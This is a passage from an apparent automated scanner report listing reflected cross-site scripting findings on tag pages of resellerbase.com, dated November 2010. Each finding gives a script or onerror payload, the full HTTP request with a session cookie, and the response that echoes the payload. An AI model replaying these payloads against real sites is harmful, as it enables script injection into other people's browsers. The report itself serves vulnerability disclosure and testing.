<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller rightsdce56<img src=a onerror=alert(1)>bdfdc249d23]</td>
...[SNIP]...

2.4363. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f57ba</title><img%20src%3da%20onerror%3dalert(1)>c9b9170b5928d6351 was submitted in the REST URL parameter 2. This input was echoed as f57ba</title><img src=a onerror=alert(1)>c9b9170b5928d6351 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/reseller+rightsf57ba</title><img%20src%3da%20onerror%3dalert(1)>c9b9170b5928d6351?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller rightsf57ba</title><img src=a onerror=alert(1)>c9b9170b5928d6351</title>
...[SNIP]...

2.4364. http://www.resellerbase.com/tag/resellers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 476b5<script>alert(1)</script>2f09305c02f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag476b5<script>alert(1)</script>2f09305c02f/resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag476b5<script>alert(1)</script>2f09305c02f/resellers was not found on this server.</p>
...[SNIP]...

2.4365. http://www.resellerbase.com/tag/resellers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7790<script>alert(1)</script>912be735c6ddcc63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd7790<script>alert(1)</script>912be735c6ddcc63d/resellers?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd7790<script>alert(1)</script>912be735c6ddcc63d/resellers?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4366. http://www.resellerbase.com/tag/resellers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd969<img%20src%3da%20onerror%3dalert(1)>fa780bd9af7 was submitted in the REST URL parameter 2. This input was echoed as bd969<img src=a onerror=alert(1)>fa780bd9af7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellersbd969<img%20src%3da%20onerror%3dalert(1)>fa780bd9af7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellersbd969<img src=a onerror=alert(1)>fa780bd9af7]</td>
...[SNIP]...

2.4367. http://www.resellerbase.com/tag/resellers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 58307</title><img%20src%3da%20onerror%3dalert(1)>a39cc6ac17735b8d2 was submitted in the REST URL parameter 2. This input was echoed as 58307</title><img src=a onerror=alert(1)>a39cc6ac17735b8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resellers58307</title><img%20src%3da%20onerror%3dalert(1)>a39cc6ac17735b8d2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellers58307</title><img src=a onerror=alert(1)>a39cc6ac17735b8d2</title>
...[SNIP]...

2.4368. http://www.resellerbase.com/tag/resellers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c36a<img%20src%3da%20onerror%3dalert(1)>4146587cd333c5eef was submitted in the REST URL parameter 2. This input was echoed as 5c36a<img src=a onerror=alert(1)>4146587cd333c5eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resellers5c36a<img%20src%3da%20onerror%3dalert(1)>4146587cd333c5eef?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellers5c36a<img src=a onerror=alert(1)>4146587cd333c5eef]</td>
...[SNIP]...

2.4369. http://www.resellerbase.com/tag/resellers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 36b56</title><img%20src%3da%20onerror%3dalert(1)>1a91bee8613 was submitted in the REST URL parameter 2. This input was echoed as 36b56</title><img src=a onerror=alert(1)>1a91bee8613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellers36b56</title><img%20src%3da%20onerror%3dalert(1)>1a91bee8613 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellers36b56</title><img src=a onerror=alert(1)>1a91bee8613</title>
...[SNIP]...

2.4370. http://www.resellerbase.com/tag/reselling [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4dee<script>alert(1)</script>ddb4db9122a4fffb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /taga4dee<script>alert(1)</script>ddb4db9122a4fffb8/reselling?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga4dee<script>alert(1)</script>ddb4db9122a4fffb8/reselling?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4371. http://www.resellerbase.com/tag/reselling [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db171<script>alert(1)</script>af2203f2fdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagdb171<script>alert(1)</script>af2203f2fdc/reselling HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagdb171<script>alert(1)</script>af2203f2fdc/reselling was not found on this server.</p>
...[SNIP]...

2.4372. http://www.resellerbase.com/tag/reselling [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload acde9<img%20src%3da%20onerror%3dalert(1)>2d5871736f8770bf7 was submitted in the REST URL parameter 2. This input was echoed as acde9<img src=a onerror=alert(1)>2d5871736f8770bf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resellingacde9<img%20src%3da%20onerror%3dalert(1)>2d5871736f8770bf7?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellingacde9<img src=a onerror=alert(1)>2d5871736f8770bf7]</td>
...[SNIP]...

2.4373. http://www.resellerbase.com/tag/reselling [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cae0c</title><img%20src%3da%20onerror%3dalert(1)>97ac77869a1106386 was submitted in the REST URL parameter 2. This input was echoed as cae0c</title><img src=a onerror=alert(1)>97ac77869a1106386 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resellingcae0c</title><img%20src%3da%20onerror%3dalert(1)>97ac77869a1106386?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellingcae0c</title><img src=a onerror=alert(1)>97ac77869a1106386</title>
...[SNIP]...

2.4374. http://www.resellerbase.com/tag/reselling [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0529<img%20src%3da%20onerror%3dalert(1)>eed82fe8528 was submitted in the REST URL parameter 2. This input was echoed as f0529<img src=a onerror=alert(1)>eed82fe8528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellingf0529<img%20src%3da%20onerror%3dalert(1)>eed82fe8528 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellingf0529<img src=a onerror=alert(1)>eed82fe8528]</td>
...[SNIP]...

2.4375. http://www.resellerbase.com/tag/reselling [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e38c2</title><img%20src%3da%20onerror%3dalert(1)>8c7b151cbd1 was submitted in the REST URL parameter 2. This input was echoed as e38c2</title><img src=a onerror=alert(1)>8c7b151cbd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellinge38c2</title><img%20src%3da%20onerror%3dalert(1)>8c7b151cbd1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellinge38c2</title><img src=a onerror=alert(1)>8c7b151cbd1</title>
...[SNIP]...

2.4376. http://www.resellerbase.com/tag/ringtones [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b532<script>alert(1)</script>b73e558d1e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag7b532<script>alert(1)</script>b73e558d1e7/ringtones HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag7b532<script>alert(1)</script>b73e558d1e7/ringtones was not found on this server.</p>
...[SNIP]...

2.4377. http://www.resellerbase.com/tag/ringtones [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ec5c<script>alert(1)</script>aeeecf8e03c99484f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag5ec5c<script>alert(1)</script>aeeecf8e03c99484f/ringtones?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag5ec5c<script>alert(1)</script>aeeecf8e03c99484f/ringtones?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4378. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2c823</title><img%20src%3da%20onerror%3dalert(1)>722d33dadff was submitted in the REST URL parameter 2. This input was echoed as 2c823</title><img src=a onerror=alert(1)>722d33dadff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ringtones2c823</title><img%20src%3da%20onerror%3dalert(1)>722d33dadff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringtones2c823</title><img src=a onerror=alert(1)>722d33dadff</title>
...[SNIP]...

2.4379. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41e34<img%20src%3da%20onerror%3dalert(1)>55ab17b3474 was submitted in the REST URL parameter 2. This input was echoed as 41e34<img src=a onerror=alert(1)>55ab17b3474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ringtones41e34<img%20src%3da%20onerror%3dalert(1)>55ab17b3474 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringt
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ringtones41e34<img src=a onerror=alert(1)>55ab17b3474]</td>
...[SNIP]...

2.4380. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

